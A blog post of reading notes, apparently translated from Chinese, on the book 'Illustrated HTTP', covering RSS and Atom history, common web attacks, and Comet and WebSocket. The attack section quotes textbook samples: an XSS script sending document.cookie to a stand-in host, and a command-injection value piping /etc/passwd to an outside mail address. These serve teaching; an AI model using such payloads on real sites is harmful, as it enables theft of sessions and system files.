5. HTTP in Illustrated - RSS and Network Attacks - 技术读书笔记

tjhttp 5. "Illustrated HTTP" - RSS and Network Attacks

This section is about RSS and common network attacks. RSS always seems to be considered a "why hasn't it gone away" thing, but I found it surprisingly useful after understanding and experiencing it.

The part about network attacks will sometimes become the test point of the interview. It is still necessary to understand the basic network attack methods and common prevention methods.

Knowledge point

Introduction to the history of RSS, the significance and value of RSS, I personally think it is very suitable for people who study independently.
Introduction to WEB attack methods, understand the basic and common attack methods, these attack methods are not far from our daily life.
Regarding bottlenecks and future development, some "outdated" content due to the timeliness of writing books can be skipped.

5.1 RSS

5.1.1 RSS History

Most of the following content comes from Wikipedia, and since most of it is theoretical content, I will not explain too much.

RSS (Simple Feedback) and Atom are both collective names for news and blog log information document formats.

RSS (English full name: RDF Site Summary or Really Simple Syndication) Chinese translation of simple information aggregation, also known as aggregation content, is a format specification for news sources, used to aggregate the updated content of multiple websites and automatically notify website subscribers.

After using RSS, website subscribers no longer need to manually check whether the website has new content. At the same time, RSS can integrate the updated content of multiple websites and present them in the form of summaries, which helps subscribers to quickly obtain important information and select them. See Sexual Locations.

The historical version update of RSS is as follows:

RSS 0.9 (RDF Site Summary): The original RSS version. Developed by Netscape Communications in March 1999 for its portal. The base composition was created on the initial RDF specification.
RSS 0.91 (Rich Site Summary): Expanded elements on the basis of RSS0.9, developed in July 1999. Non-RDF specification, written in XML.
RSS 1.0 (RDF Site Summary): The RSS specification is in a state of confusion. Republished in December 2000 by the RSS-DEV working group using the RDF specification used in RSS0.9.
RSS2.0 (Really Simple Syndication): Non-RSS1.0 development route. Added support for RSS0.91 compatibility, developed by UserLand Software in December 2000.

The development of RSS now has several different versions, divided into two main branches (RDF and 2.X) .

The RDF (or RSS 1.X) branch includes the following versions:

RSS 0.90 is the original Netscape RSS release. This RSS is called _RDF Site Summary_, but is based on an early working draft of the RDF standard and is not compatible with the final RDF proposal.
RSS 1.0 is the open format of the RSS-DEV working group, which again stands for _RDF Site Summary_. RSS 1.0 is an RDF format like RSS 0.90, but not fully compatible with it because 1.0 is based on the final RDF 1.0 recommendation.
RSS 1.1 is also an open format designed to update and replace RSS 1.0. This specification is an independent draft and is not endorsed or endorsed in any way by the RSS-Dev Working Group or any other organization.

The RSS 2.X branch (originally UserLand, now Harvard) includes the following releases:

RSS 0.91 is the simplified version of RSS published by Netscape and the version number originally advocated by Dave Winer of Userland Software. The Netscape version is now called _Rich Site Summary_; this is no longer in RDF format, but is relatively easy to use.
RSS 0.92 to 0.94 are extensions of the RSS 0.91 format, which are mostly compatible with each other and with the Winer version of RSS 0.91, but not with RSS 0.90.
The build number for RSS 2.0.1 is 2.0. RSS 2.0.1 was declared "frozen" but was still updated shortly after its release, without changing the version number. RSS now stands for _Really Simple Syndication_. The main change in this release is the use of an explicit extension mechanism for XML namespaces.

5.1.2 Atoms

The same things that have not been touched very much, the contents of the encyclopedia are as follows.

Atom is a pair of standards related to each other. Atom Syndication Format is an XML - based document format for website news sources ; Atom Publishing Protocol (AtomPub or APP) is an HTTP - based protocol for adding and modifying network resources.

It draws on the experience of using various versions of RSS , and is widely used in publishing and use by many aggregation tools. The Atom feed format is designed as a replacement for RSS; and the Atom Publishing Protocol is used to replace the various existing publishing methods (eg Blogger API and LiveJournal XML-RPC Client/Server Protocol). Several services provided by Google are using Atom. The Google Data API (GData) is also based on Atom.

RSS and Atom ) are both widely supported and compatible with all major consumer feed readers. RSS is more widely used thanks to the support of early feed readers.

Technically, Atom has several advantages: less restrictive licensing, IANA registered MIME types , XML namespaces, URI support, RELAX NG ** support.

Atom has the following two standards.

Atom Syndication Format: A website news source format for publishing content. When talking about Atom alone, it means this standard.

Atom Publishing Protocol: A protocol for adding or modifying content on the Web.

For more information, please refer to these two websites:

The Atom Syndication Format:

https://www.rfc-editor.org/rfc/rfc4287.txt

Atom Syndication Format (IBM)

https://www.ibm.com/docs/en/cics-ts/5.3?topic=standards-atom-syndication-format

5.1.3 RSS Meaning

In most cases, RSS is used to subscribe to online blog applications and to obtain information from your favorite websites synchronously. Personally, I think it is similar to a different form of WeChat public account. However, in recent years, WeChat has also changed its algorithm, and the push has also changed from the previous one. Push, and now push according to user preferences.

Does RSS still make sense now? Why is anyone still using it? Personally, I think that the biggest significance of RSS subscription is to filter noise . The reading of RSS subscription needs to rely on the reader. For the content of this part of software use, please refer to "References".

RSS has several significant advantages:

From passive acquisition of information to active acquisition of information.
To circumvent the algorithms of various Internet companies.
Block out the noise of the internet.
Going back to basics, not all "times backwards" are wrong.

These points basically determine that many platforms will not like this thing, because it blocks the way of money.

Of course, RSS has its shortcomings. The biggest disadvantage is that it is too niche, so it is not surprising that it will disappear one day. Since there is almost no profit to be made, the current competition is a few forces that make standards. Relatively rare case.

In fact, a considerable number of people are still using RSS.

5.2 WEB attack

In order to achieve its simplicity and efficiency, HTTP maintains the stateless feature in HTTP1.X, so its ability to security protection is almost 0. Basically, major network attack security accidents can be seen every year, because according to Murphy's law This kind of thing always happens.

The attack methods are mainly divided into active attack and passive attack.

Passive attacks mainly use phishing websites or links to guide users to click, and then run attack codes to obtain personal information of users' computers, etc. Active attacks are traffic shocks similar to DDos.

In most cases, there are more passive attacks, because there is almost no labor cost, while active attacks are basically some websites with a lot of traffic value, which are often subject to similar attacks.

The following is a huge list of common WEB attack methods according to the content of the book.

5.2.1 XSS attack

The first is the more common XSS attack (cross-site scripting attack), which is mainly completed through illegal HTML tags or JS scripts. By pre-setting website traps, users may be attacked when filling in their personal sensitive information.

 http://example.jp/login?ID="> <script>var+f=document.getElementById("login");+f.action="h </script><span+s=" 对请求时对应的HTML源代码（摘录）

In addition to obtaining the login information, there is also a method to directly obtain the user's personal information by grabbing the content of the cookie through JS script, for example, using code like the following:

 var content = escape(document.cookie); 
document.write("<img src=http://hackr.jp/?"); 
document.write(content); 
document.write(">");

5.2.2 SQL Injection

SQL injection mainly occurs when programming developers do not treat SQL rigorously, resulting in SQL injection attacks.

For example, the book mentioned the use of similar methods to obtain some inaccessible information by injecting single quotation marks into SQL parameters, causing the subsequent SQL content to become invalid.

The solution is also relatively simple. You need to be careful as much as possible or avoid using placeholders. Instead, use special symbols such as "?" for parameter substitution instead of directly embedding SQL.

SQL obviously also uses the rules of SQL syntax to complete the injection operation of this special character. Of course, in more cases, it is caused by the imprecision of website programmers.

If you think that this kind of thing happens rarely, you are wrong. There are still a lot of websites in China that have not even taken precautions against the most basic SQL injection problems.

5.2.3 OS attack

OS attacks are not uncommon. The mining script that has been common in cloud servers in recent years is one of them. This kind of virus that follows open source components is nasty and disgusting.

For specific cases of OS attacks, see the following: Use the method of obtaining user emails to find out OS vulnerabilities, and use commands such as pipe characters to quickly steal email accounts and passwords to achieve the purpose of stealing accounts.

 my $adr = $q->param('mailaddress');

open(MAIL, "| /usr/sbin/sendmail $adr"); 

print MAIL "From: info@example.com\n";

The attacker specifies the following value as the email address.

 ; cat /etc/passwd | mail hack@example.jp

The program receives this value and forms the following command combination.

 | /usr/sbin/sendmail ; cat /etc/passwd | mail [hack@example.jp](mailto:hack@example.jp)

5.2.4 DDos attack

A very direct and brutal attack method, knocking down the target server through large-scale traffic, leaving the target server in a state of paralysis and inaccessible. So it is also called a denial of service attack and a stop-of-service attack .

DDos attack methods are mainly the following two:

Overloading centralized access resources is actually the implantation of meaningless programs that require a lot of computation to exhaust computer resources.
Attacking a system vulnerability causes the service to stop. Often such vulnerabilities originate from vulnerabilities in open source code. For example, the notorious FastJson leaks need to be fixed every three days.

For attackers, the cost of DDos is very low, because foreign countries can purchase a large number of broiler servers to complete this operation, but for an independent website accessed by an online customer, there are actually not many solutions to protect, and most of the time only "Burn money" to solve the problem, because the source of the attack cannot be identified.

5.2.5 Directory Traversal Attacks

Directory attack is the behavior of obtaining user passwords by accessing certain permissions-sensitive paths, such as trying to obtain /etc/passwd related information through scripts.

5.2.6 Cross-site request forgery

Also known as CSRF attack , it also uses traps to induce user operations. After obtaining user information, some "cross-border" operations are completed through the user's identity.

5.2.7 Session Attack

Session attack, for many websites, session information related to user login is stored, and user ID information is inferred or obtained by various means, and then the user identity is forged based on this information to complete the login operation.

The above attack is session hijacking, which uses traps or brute force to obtain information. The other is to use the user login operation, use the same user ID to wait for the user to complete the operation and get the current session information access, which is a bit similar to Quiet Mimi. If you enter the door behind others, you will not be discovered. When you enter, you will only wait until the owner leaves and then go in to steal things.

For such information protection, simple processing can add IP verification rules during authentication. If the same identity information is sent from different IPs, it can be considered as a kind of session content theft.

5.2.8 Clickjacking

Using the characteristics of network iframes and transparent elements, overlaying the clicked button on the original page will also bring relevant information to the past.

5.2.9 Password cracking

The methods of password cracking are usually the brute force method and dictionary attack . The brute force method usually takes advantage of the situation that users like to use information such as birthday or name as the password, and conducts forced cracking through trial and error, and brute force cracking by formulating rules. The premise of exhaustive cracking is that the length of the secret key is small enough, and another is to crack the encrypted ciphertext, and also use the method of querying the dictionary to perform trial and error.

Common encryption cracking methods are as follows:

By analogy with the exhaustive method and dictionary attack: that is, the so-called combination of exhaustive method and dictionary attack through a hash function, this method is suitable for systems encrypted with general encryption functions.
Rainbow table: A rainbow table is a database table composed of plaintext passwords and their corresponding hash values. It is called a rainbow table because it contains various encryption functions. The encrypted ciphertext is like a "rainbow" Again, the goal is to reduce the time overhead of exhaustive and dictionary methods.
Rainbow table is a more effective means of cracking.

Currently published on the website https://freerainbowtables.com/ , a rainbow table composed of MD5 hash values corresponding to 1~8 bit strings of uppercase and lowercase letters and numbers is fully arranged

Obtaining the key: Obtain the user's public key through network hijacking and other means and request the target server by forging the key, and finally realize the cracking method of deceiving the server to obtain the ciphertext.
Vulnerabilities of encryption algorithms: It is difficult to find loopholes in the current mainstream information encryption algorithms, so it is a method with a very low success rate.

The way to prevent password cracking is to limit the number of incorrect password verifications and frequent requests in a short period of time. For encrypted data, a content called "salt value" will be added to the original ciphertext.

5.2.10 Backdoor program

Backdoors set up entry points rather than attack directly when vulnerabilities are discovered. By exploiting the loopholes through backdoor programs, information theft can be accomplished without the perception of problems in daily access. Since it is very difficult to find, backdoor programs are a very high-risk WEB attack method.

The development phase is a backdoor called by Debug.
Backdoors implanted by developers for their own benefit.
A backdoor program set up by an attacker through a certain method.

Here is a brief description of the second type, which has many practical cases, such as a case where a simple and rude payment website randomly replaces the payment code through a backdoor program.

There is also a background program similar to "screw wool", which charges a "handling fee" of "0.00*N1" for each order. Such a background program is basically difficult to find if it is not eye-catching. At the same time, although the number is small, the number of users In very large cases, this income is actually a huge sum of money.

These things are high voltage lines, don't try it!

5.3 Bottlenecks and "future" developments

At present, we now see that the future mentioned in this book has been realized, and these contents can be simply looked at.

SPDY (HTTP2.0)
Ajax
WebSocket
Comet
HTTP long connection

5.3.1 SPDY - The Chromium Projects

This part of the content is described in detail in the history of HTTP2.0 in [["Illustrated HTTP" - HTTP Protocol History Development (Key Point)]], and will not be repeated here.

5.3.2 Ajax

The core technology of Ajax is the API named XMLHttpRequest, which can communicate with the server through HTTP by calling the JavaScript scripting language, and use Ajax to complete the operation of partial update of WEB pages.

5.3.3 Comet

The original meaning of this word is called "Comet". Before the WebSocket technology has not completely solved the browser compatibility problem, there is a wide range of application requirements for "server push" ( Comet technology), and the demand promotes the development of technology. It is almost indispensable in the solution of instant messaging on the Web side.

Technology before this:

Before Comet , there was an earlier reverse content push implemented by server push, which was gradually abandoned by the times Flash , but the premise of using Flash was voluntary installation by users. Flash can easily complete JS calls, and provide XMLSocket class interface to implement reverse push, so it is the only way for server push for a long time.

Another technology is the long-dead Java Applet, which completes socket connection and server push through java.net.Socket or java.net.DatagramSocket or java.net.MulticastSocket, but it has a fatal flaw that Applet cannot Combined with JavaScript to complete the dynamic refresh of real-time pages.

How did Comet develop?

Real-time Comet itself also depends on the popularization and extension of Ajax, so Comet is defined as: "Server Push" technology based on HTTP long connection without installing plug-ins on the browser side is "Comet".

Comet implementation?

There are two implementations of Commet, the first is the long-polling method based on AJAX , and the second is the streaming method based on Iframe and htmlfile .

First, briefly describe the first method. The long polling method needs to continuously establish an HTTP handshake connection with the server. Each connection will waste a lot of unnecessary network overhead.

The second is to use iframe nesting and html file streaming. Although the iframe tag has long been deprecated (and deprecated) by HTML, it was once one of the few options for implementing long links. Play an important role.

The principle is very simple, that is to nest the URL to get the data in the Src tag of the iframe. In the Iframe, it does not return the page but returns the JS code called by the client. When the client receives the JS call returned by the server, it will execute the code.

But obviously iframe does not allow such nested JS code calls in many browsers, so Google subsequently proposed to use ActiveX, which actually encapsulates a JavaScript comet object based on iframe and html file .

But because the old version of IE is incompatible with Google and FIreFox, this thing used to be disgusting in the past (in terms of IE compatibility), and it requires some template code optimization and processing in the front-end, which is more troublesome.

The way to use Comet is to return a response as soon as it finds an update on the server. Use the delayed response method to simulate the push function. When receiving a request Comet, it will first put the response in a pending state, and then return the response when the content is updated on the server side.

Related open source components
Pushlet: An open source Comet framework that uses the observer model
IComet: A comet/push server developed in C++ that supports millions of concurrent connections

Comet is a transitional "plug-in" that solved the problem of server push in the past. Although it solved the problem to a certain extent, it belongs to Weiwei and Zhao. In essence, the client's sending of requests has not fundamentally changed.

So Comet does not need to spend too much effort, more details can be found in the "References section".

5.3.4 HTTP long connection feature

In addition to the many limitations of Comet itself, HTTP persistent connections themselves have some notable features.

There is a limitation of HTTP1.1 long connection , that is, the client should not establish more than two HTTP connections with the server. In IE, the download of more than two files is blocked.
Server-side performance and scalability . If there are frequent Ajax requests, Comet will occupy a connection for a long time. Although Java.io provided in JAVA1.4 can realize the return of thread resources to the thread pool when the connection is idle, it should deal with Ajax There are still some problems with frequent requests, making fewer idle connections and affecting performance. For this reason, Jetty has some optimizations for Comet, which are described in detail in the related article "AJAX, Comet and Jetty" (but unfortunately this article is no longer available).
The control information and data display are separated , and the HTTP long connection closing needs to rely on the client to send a closing request, but in many cases the client will close the web page by itself, and the server needs to change the blocking waiting for the client request to close. To solve this problem in the AJAX implementation a shutdown request is sent asynchronously. The iframe-based method requires two Iframes, one for display and the other for exchanging control information. The control request can be responded quickly and will not be blocked by the display information.
Maintaining the heartbeat, the so-called maintenance heartbeat is that the server needs a checking mechanism to check whether the client is active. It regularly checks whether the client closes the connection. If the connection is closed, it will enter the block read link, and if the client is closed, it will enter Exception status and close the connection to release resources.
Note that if the AJAX-based long polling method needs to use a timer , when the client does not send a request for a long time through the timer, it will consider that the client has closed by itself and also release resources to ensure effective use of server resources.
Finally, if there is a problem with itself, you also need to notify the client and release resources to prevent the vulnerability from overflowing.

5.3.5 WebSocket

Originally part of the HTML5 standard, as a result, it gradually separated from HTML5 and became an independent protocol after its appearance. Modern mainstream browsers are basically compatible with WebSocket (except IE).

The WebSocket communication protocol was standardized on December 11, 2011 by RFC 6455 - The WebSocket Protocol .

WebSocket solves the pain point problem of Comet and Ajax. Once the communication connection of the WebSocket protocol is established between the Web server and the client, all subsequent communications rely on this dedicated protocol, that is to say, it is similar to the "upgrade" of the protocol. Actively obtain data, the server can directly push data to the client after establishing a connection.

Design Purpose: The original purpose was to address the bugs that Ajax and Conmet's XmlHttpRequest came with. The fundamental flaw of these two components is that the request can only be sent by the client .

Of course, it is not to say that real-time updating of content cannot be completed only by using client requests. One way is to use polling to obtain information, but polling means continuous connection with the server request, and as a transitional compatible component "comet".

About WebSocket has the following characteristics:

(1) Built on the TCP protocol, it is compatible up and down.

(2) It has good compatibility with HTTP protocol. The default ports are also 80 and 443, and the HTTP protocol is used in the handshake phase, so it is not easy to shield during the handshake, and can be proxyed by HTTP.

(3) Lightweight response format, efficient.

(4) Text can be sent, and binary data can also be sent.

(5) There is no same-origin restriction, and the client can communicate with any server.

(6) The protocol identifier is ws (if encrypted, it is wss ), and the server URL is the URL.

(7) Reduce the amount of traffic, because once the connection is established, the connection state will be maintained, so the overhead of the HTTP header will also be reduced.

Case:

 // Create WebSocket connection.
const socket = new WebSocket('ws://localhost:8080');

// Connection opened
socket.addEventListener('open', function (event) {
    socket.send('Hello Server!');
});

// Listen for messages
socket.addEventListener('message', function (event) {
    console.log('Message from server ', event.data);
});

The basic steps are as follows:

Handshake request. After the HTTP connection is established, use the Upgrade header field of HTTP to inform the server that the communication protocol has changed. You can see that an "upgrade protocol" request is initiated again after the HTTP connection is made.

 GET /chat HTTP/1.1
Host: server.example.com
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
Origin: http://example.com
Sec-WebSocket-Protocol: chat, superchat
Sec-WebSocket-Version: 13

Remarks: The Sec-WebSocket-Key field records the essential key value in the handshake process. The sub-protocol used is recorded in the Sec-WebSocket-Protocol field.

Because there may be data exchange in the initial HTTP connection, a response with status code 101 Switching Protocols is returned for the previous request.

If you don't know what 101 is, it doesn't matter. If you look at the chapter [["Illustrated HTTP" - Status Code]], you will find that it is actually a prompt message that has no effect. The following explanation is translated by yourself, which is conducive to deepening the impression.

101状态码

The picture of WebSocket in the book is good, and you can basically feel how WebSocket, a separate protocol, cooperates with HTTP.

WebSocket

There are many details about WebSocket that can be expanded. Since this book is aimed at the most basic beginners, I will not explain too much in this reading note. I also found some information on the Internet as an extension. For details, please read the "References" section. .

WEB History

WEB history tells about HTML+CSS+JAVASCRIPT and DOM, and also introduces servlets that are no longer used. Among these technologies, servlets need to be mentioned. This technology that seems to have nothing to do with the current WEB is actually still active, but In another form, it was packaged by Spring and disappeared, so if you want to learn Web well, mastering Servlet is essential.

5. HTTP in Illustrated - RSS and Network Attacks